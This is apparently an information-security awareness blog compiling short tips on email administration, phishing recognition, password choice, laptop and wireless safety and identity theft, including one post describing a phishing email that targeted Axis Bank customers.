10 tips for securely managing e-mail

“As an IT manager, looking after your company email can be a major headache. Being one of the primary portals for security threats and other IT issues, it is vital that email is properly managed to protect assets and ensure employees remain productive,” says Leon Rishniw, senior vice president of engineering, Cloudmark.

1. Educate your employees: Educate and remind your users about the dangers of forwarding jokes, racy content, chain letters or political messages outside your network, as recipients are likely to report these as spam and your IP will get listed. You should also make your users aware that if they include a signature line that includes the company’s URL and phone/fax numbers, their emails are also likely to get blocked.

2. Educate your marketing department: Ensure your marketing department doesn't send out newsletters/ads using your normal outbound IP, as recipients will report the mailings as spam and your IP will get listed. Outbound mail should be restrictive, filtered and encryption authenticated. Do not build opt-out mailing lists, and be very quick to remove any subscribers that do not wish to be on the list. Another point to consider is that a virus outbreak that sends email you do not know about can cause your domain or network space to become blacklisted. Lastly, force outbound mail to go through servers that you control rather than going out directly.

3. Monitor: Keeping an eye on aspects such as inbound/outbound network traffic, service traffic, inbound connection attempts and port scans can help determine if your system has been compromised or if you need to take action.

4. Control your systems: Keep your systems locked down. It is important that you restrict inbound connections to any ports that you do not need to keep open. Ensure that all PCs require SMTP authentication on outbound mail, and force mail to go through your outbound MTAs (block port 25 connections outbound).

5. Use email authentication technologies: Use email authentication technologies and understand how the technology evolves. Email authentication technology is here to stay so it is important to learn how it can be leveraged to benefit your company, both when sending and receiving emails.

6. Stay up to date with patches: It’s a bit of a cliché but you must keep up to date with patches. This is important, not only on desktop computers but on servers as well. Viruses are not the only problem; a weak web application can also be exploited. For example, it can send an email you didn’t mean to send, irritating the recipients and earning your domain or IP address a bad reputation that could interfere with your regular messaging operations.

7. Configure your email server correctly: Ensure your Internet-facing email server environment is configured to validate recipients at reception time against your local LDAP system; otherwise you’ll be generating a lot of “backscatter” traffic when your un-validated content is attempting to be delivered to your internal Exchange/Notes/Zimbra/etc. server. This will get you blacklisted very quickly.

8. Set DNS protocols correctly: Make sure your forward and reverse DNS for your outbound hosts match.

9. Other security tips: Get to know the major RBLs now rather than scrambling around when your outbound IP address inevitably gets listed due to a bot’ed PC on your network. Also, deploy BATV to ensure you don’t receive bounces for spoofed content that you never originated.

10. Watch out for ‘free’ enterprise ready software: If you are serious about protecting your users (and your job), invest in one of the top commercial anti-spam software products.


Source : www.net-security.org/

Letting Family or Friends Use Your Employer's Computers Can Be Bad for You !!!

A candidate for Parliament in the UK received a lot of bad publicity when people took offense at a message her husband sent from her Council email account. She isn't the first person to get into trouble over a family member misusing their work email account or PC. Very few organizations let employees' families use their PCs. If you work from home on a corporate PC, then check your company policy and clarify boundaries with household members.


Source:sans.org

Print out important documents

A digital photography expert told me that CDs are expected to "live" for up to ten years. I want kids—and maybe grandkids—to see photos, so I print the best ones. Same goes for documents: print important files so that they are accessible in future decades. Of course, you want to back up these files too.


Source: sans.org

Don't click the "unsubscribe" link at the bottom of unsolicited emails

Spam filters are catching most unwanted e-mail, but some might still reach you. Most spam is designed to get you to respond with your own email or to click a link to "unsubscribe." When you respond or click the "unsubscribe" link, the sender takes your email address and adds it to a SPAM database of active email addresses. You might then start to receive a large amount of SPAM in your inbox. Do not respond or click the "unsubscribe" links.


Source: Sans.org

Don't check "remember my password" boxes

Numerous programs offer the option of "remembering" your password. Unfortunately, many of them have no built-in security measures to protect that information. Some programs actually store the password in clear text in a file on the computer. This means anyone with access to the computer can read the password. It's best to retype your password each time you log in eliminating the possibility that someone will be able to steal or use it.


Source:sans.org

Get it out of the car

Don't leave your laptop in the car - not on the seat, not in the trunk. Parked cars are a favorite target of laptop thieves; don't help them by leaving your laptop unattended. If you must leave your laptop behind, keep it out of sight.

Source:sans.org

Turn off the message preview pane in Outlook or Outlook Express

If the message preview pane is enabled, the messages in your inbox are automatically "opened" as you scroll through them. While this is convenient, it also poses a potential security risk. If you disable the preview pane, you can delete any email that looks suspicious BEFORE it's opened and avoid a possible virus infection.

Source: Sans.org

Review your credit reports routinely

The Fair Credit Reporting Act (FCRA) requires each of the nationwide consumer reporting companies — Equifax, Experian, and TransUnion — to provide you with a free copy of your credit report, at your request, once every 12 months. Take advantage of these free reports, and verify the information that they contain.


Source:sans.org

Phishing attack leveraging SMS ban

Today morning was just about going as usual till I noticed an email. It seemed to originate from AXIS bank and it had an HTML attachment and it was an important announcement.

The contents of the email looked valid considering Government of India had placed a ban on sending of bulk SMS till 29th. Now I am not sure if such ban holds good for financial institutions. But some smart bloke seems to have capitalized on this ban. The email stated that:

“In view of the Govt. of India directive to mobile operators, all the corporate sms messaging services have been blocked for the next 72 hours. This period may increase. In view of this exigency, Axis Bank Net Secure Code and transaction alerts delivery has been effected. Therefore, till the Govt. of India permits restoration of the system.

Axis Bank customers may not be able to conduct Internet Banking transactions that use SMS for delivering the NetSecure code. This is a regulation by Govt. of India and beyond Axis Bank’s control.

We have attached a form to this email. Please DOWNLOAD the form attached to this email so that you can fill and submit it Online to us , so that we can verify your account , After the Govt. of India permits restoration of the system. .
NOTE: The form needs to be opened in a modern browser which has javascript enabled ( Internet Explorer 7, Firefox 3, Safari 3, Opera 9)”

Now unlike the other phishing emails that I have encountered this one seemed different and the content (read grammar) also looks more in line from a professional agency and in tandem with the events that are happening in India.

This is the snapshot of the email:

Phishing Email targetting Axisbank

I opened the HTML attachment, after a customary scan from AV. Now although this looks authentic, but is a bit suspicious because it is asking for too many private details that should evoke second thoughts from anybody. Generally any phishing attack would ask for username, password, cvv details at the max. But this one is prompting for ATM PIN,Transaction password, Secure Code/Verified by Visa, Email details. And unlike others where you enter the details on a site, it is sending an attachment to be filled and submitted. Modus Operandi is slightly different.

I bet someone who is familiar with Axis bank’s online transaction mechanism has set this up because Axis bank requires transaction password in addition to the details mentioned above for a online transaction. Now, the form is a html attachment and when you open everything looks authentic just take a look below.

Phishing HTML attachment targetting Axis bank

This is it, but once you look at the page source carefully you will realize the bait. Using the POST method, all details would go to the URL specified instead of Axis bank:

Phishing URL targetting Axis bank

A Whois lookup for the domain above lists that is based out of Poland. All I can do is just notify Axis bank of this. It would have been better if the Government of India or the financial institutions have had made it clear if their services would continue to operate or be impeded due to this SMS ban.

Take care and please spread a word to ensure people do not fall for this

UPDATE:

I would have thought that the content in their email was written by a smart bloke, but it’s actually flicked from Axis Bank’s login page!

Treat your laptop like cash !!!

If you had a wad of money sitting out in a public place, would you turn your back on it - even for just a minute? Would you put it in checked luggage? Leave it on the backseat of your car? Of course not. Keep a careful eye on your laptop just as you would a pile of cash.

Visit http://onguardonline.gov/laptop.html for more information.

Source:sans.org

VoIP: It's a phone, it's a computer, it's...

Voice over Internet Protocol (VoIP) is one way people are making and receiving telephone calls using an Internet connection rather than a regular phone line. VoIP services can also be attacked by computer viruses, worms, or spam over Internet telephony (SPIT). Here is how it works: VoIP converts your phone call -- actually, the voice signal from your phone -- into a digital signal that travels over the Internet to the person you are calling. If you are calling a plain old telephone number, the signal is converted back at the other end. If you're comfortable with new technology, you may want to learn more about VoIP. It's smart to do some research on this technology before signing up for it.

Source:sans.org

10 Scams to Screen from Your Email

1. The "Nigerian" Email Scam
2. Phishing
3. Work-at-Home Scams
4. Fake software updates
5. Foreign Lotteries
6. Sexual Enhancement products
7. Check Overpayment Scams
8. Pay-in-Advance Credit Offers
9. Debt Relief
10. IRS refunds

Source:sans.org

It's 10 p.m. Do you know whom your kids are chatting with online?

While social networking sites can increase a person's circle of friends, they also can increase exposure to people with less than friendly intentions. Here are tips for helping your kids use social networking sites safely:

• Help your kids understand what information should be private.
• Explain that kids should post only information that you - and they - are comfortable with others seeing.
• Use privacy settings to restrict who can access and post on your child's website.
• Remind your kids that once they post information online, they can't take it back.
• Talk to your kids about avoiding sex talk online.
• Tell your kids to trust their gut if they have suspicions. If they ever feel uncomfortable or threatened by anything online, encourage them to tell you.

Source:sans.org

Don't get hooked by a Phishing expedition

• Don't reply to email or pop-up messages that ask for personal or financial information, and don't click on links in the message.
• Don't cut and paste a link from the message into your Web browser -- phishers can make links look like they go one place, but actually send you to a different site.
• Use anti-virus and anti-spyware software, as well as a two-way firewall, and update them all regularly.
• Don't send personal or financial information by email.
• Be cautious about opening any attachment or downloading any files from emails you receive regardless of who sent them.

source:sans.org

If your personal information is stolen, four steps to take !!!

It's important to protect your personal information, and to take certain steps quickly to minimize the potential damage from identity theft if your information is accidentally disclosed or deliberately stolen:

• Place a "Fraud Alert" on your credit reports, and review those reports carefully. Notifying one of the three nationwide consumer reporting companies is sufficient.
• Contact your bank or other financial institution(s) and close any accounts that have been tampered with or established fraudulently.
• File a police report with local law enforcement officials. This is an essential step for protecting your rights.
• Report your theft to the Federal Trade Commission, online, by phone, or by mail

Source : Sans.org

Secure your Wireless Router

When setting up a wireless network at home, I was surprised to be able to connect to my neighbor's unsecured wireless router. Not only could I have used his bandwidth for free, but had I been so inclined, I could have used the connection for illegal activities. If the police came looking, he may not have been able to prove the activity didn't come from one of his computers. Properly securing wireless is not hard. Look in the manual for changing the SSID to something unique, turning on WPA (avoid WEP) for authentication and TKIP for encryption, and using MAC address filtering.

For more details contact me !!!!!! or goolge....


Source:sans.org

Choose a password that's hard to crack

When choosing a password, try to make it by writing a sentence that you can easily remember. For example: "Los Angeles Lakers will win the NBA tournament this year". Then pick up the first letters of each word and also add at the beginning or at the end (or at both parts) some special characters and numbers. For example, with the last sentence you could get the password: =3LALwwtNtty$. This method lets you come up with easy-to-remember passwords that are also hard to crack. And you avoid the need to write such a long password down in order to remember it.


Source: Sans.org

Do not give your password over the phone to anyone claiming to be from the HelpDesk or Tech Support

No one from the HelpDesk or Tech Support will ever ask you for your password. If we need to access your account for some reason, and cannot contact you in time, we will reset the password and notify you by voicemail. Anyone calling and asking you for your password is most likely trying to gain unauthorized access to our network. If you receive such a call, notify your supervisor immediately.

Source: Sans.org

Don't use e-mail to send private messages

In a hospital romance right out of prime time television, one young woman involved in a three-way love triangle used her personal hotmail account to send romantic messages. She got a response she definitely did not expect: the party she had been cheating on cracked into her hotmail account, printed out some very personal messages and posted them on the message board at the small town supermarket for all to see. Moral of the story: protect your passwords. And PS. As long as you're planning on getting fired, you're better off spending time working on your resume than sending romantic e-mails that you don't want publicized.

Source:sans.org

Don't buy anything from a spammer

If an unexpected email brings you news that seems too good to be true, it is probably a spam and a scam. If you didn't request information about the product or service, it is probably a spam and a scam. If it promises to enhance parts of your body, it won't. If it promises you an easy mortgage, you can do better by visiting your bank. If it promises that you can make a fortune on a penny stock, you can't. If you are unsure, ask five friends. Chances are four of them also received the spam and you can know to steer clear.


Source: Sans.org

Avoid Ad-hoc wireless networks

Disable automatic connection to any new networks and limit your connections to access point (infrastructure) networks only:

• Click the "Start" button and navigate to the "Control Panel" and then to "Network Connections."
• Right mouse-click on the "Wireless Network Connection" and choose "Properties".
• Pick the "Wireless Networks" tab, then the "Advanced" button:
  • Make sure that the check box next to "automatically connect to non-preferred networks" is not checked.
  • Click on Access point (infrastructure) networks only to avoid ad hoc networks.

This configuration prevents you from automatically connecting to any new networks and refuses all ad-hoc networks, which have the potential to monitor traffic that passes through them.


Source: sans.org

Never respond to an email asking for personal information

Companies you do business with should never ask for account information, credit card numbers or PIN information in an email message. If you have any questions about an email you receive that supposedly comes from your financial institution, call the local branch office. Do NOT respond to the email.


Source:sans.org

Avoid spam in your IM email account

Did you ever sign up with an Instant Messenger client so that you could chat with your buddies? Perhaps you have more than one running on the desktop. Each popular IM client comes conveniently with an Email account, and each time there is an email associated with your IM screen name, you receive a notice with this account filling up. You can prevent the spam or any email notices from appearing by using a single filter. Since I added the following filter on my email account attached to my Yahoo IM, I no longer get these notifications. Simply add a filter that the From/ Address includes @ to go directly to trash. You will be able to communicate with all your IM buddies without the hassle of being notified of items coming into the inbox.

Source: Sans.org

Paper files Have to Be Protected Too

You've probably heard that To err is human, but to foul things up completely you need a computer. We know it's important to protect the big databases that we store, but we can't ignore paper records. The amount of information held on paper may be much smaller, but many of the most serious leaks happen through very human methods — reports stolen from desktops or read over someone's shoulder. Keep sensitive paper files locked away when they are not being used and don't read them in public places.


Source: sans.org

Lock your workstation before you leave your desk

Did you know there are keyboard shortcuts other than CRTL+ALT+DEL that you can use to lock your desktop? This will prevent people from walking up and snooping on your computer. You can save a keystroke by simultaneously pressing the Windows key + L. The Windows key has four wavy squares.

Or, to make things even easier, create a desktop shortcut.

1. Right click any empty area of your desktop
2. Click New
3. Click Shortcut
4. Type in the following: rundll32.exe user32.dll, LockWorkStation
5. Click Next
6. Name your shortcut
7. Click Finish

Now it's as easy as a double click!

Sans.org

Don't tell ANYONE your password

One way someone could learn your password is to phone you claiming to be from another part of your organization, maybe your IT or Audit teams, and say they need your account details to let them investigate problem. This should never be necessary. Good systems are set up so that nobody but you will ever know your password and authorized IT workers have their own accounts giving them access to what they need.






Source: Sans.org

Passwords: Be creative

If you can't remember hard passwords no matter how hard you try, put your password in parenthesis. baseball38 is a weak password. (baseball38) is much better.

When you change your password, you should always change at least half of it and when you do, change the parentheses as well. Change the parentheses to asterisks, exclamation points or dollar signs. *sallyandbob39* is better than sallyandbob39, and !jimandbetty93! is better than jimandbetty93.


Source:sans.org

Do NOT open unknown or unexpected e-mail attachments

This morning I got an e-mail from my boss with an attachment. My boss is a man of few words on e-mail. If he wants to explain or discuss something with me, he picks up the phone. When he wants me to read or edit something we have talked about, he sends it to me. Even though the subject line was a date, the e-mail had no text, AND my boss hadn't told me he was sending me an attachment, I opened it because it was from my boss at an e-mail address I recognized. Bad move. Imagine my surprise when my Norton anti-virus screen popped up with a message that the attachment contained a virus and had been deleted. Hackers had spoofed his address and I had fallen for it.


source:sans.org

Check and make sure your friend sent that great screen saver

A common method of transmitting malware is by infecting some unsuspecting user's computer and then using that computer to infect others. One simple way to do this is for a hacker to hijack your address book and send copies of the malware to everyone in that address book. Of course, YOU need to be enticed to run the malware, and the best way to do that is to fool you into thinking the attachment is something else. If a friend or acquaintance sends you a "great screensaver" or something like that, which you were not expecting, take a few minutes to confirm that person really sent it. If they know nothing about it, then delete the message.


Source:Sans.org

Don't Accept Offers of "Free PC Scans" That Pop up When You Use the Internet

Secure Computers LLC paid a $1,000,000 fine for offering "free spyware scans" that told users their systems had been infected with spyware, even if the system was clean. They are not the only ones doing this — when you surf the Web you are still likely to see pop-up windows like that. Some "scans" don't just give misleading results; they actually try to install unwanted software on your PC. Often the screen pop-ups only have a "scan" button and no "cancel" or "quit" option. In fact they could interfere with your PC no matter which of the buttons you choose. Be safe: close pop-ups like this by clicking on the X in the top right corner of the browser window. Better yet, use a pop-up blocker software (http://www.vnunet.com/vnunet/news/2170208/security-firm-pay-million-false).


Source:sans.org

How to spot a phishing email...

How to spot a phishing email...

It could be a phishing email if...

• There are misspelled words in the e-mail or it contains poor grammar.
• The message is asking for personally identifiable information, such as credit card numbers, account numbers, passwords, PINs or Social Security Numbers.
• There are "threats" or alarming statements that create a sense of urgency. For example: "Your account will be locked until we hear from you" or "We have noticed activity on your account from a foreign IP address."
• The domain name in the message isn't the one you're used to seeing. It's usually close to the real domain name but not exact. For example:
  • Phishing website: www.regionsbanking.com
  • Real website: www.regions.com

Source: sans.org

Motive of this blog

Sharing and updation of anything related to Information Security.
To bring the collective expertise of Information Security practitioners under one umbrella.
To discuss and clarify Information Security related topics.
Bring out awareness & importance of Information Security.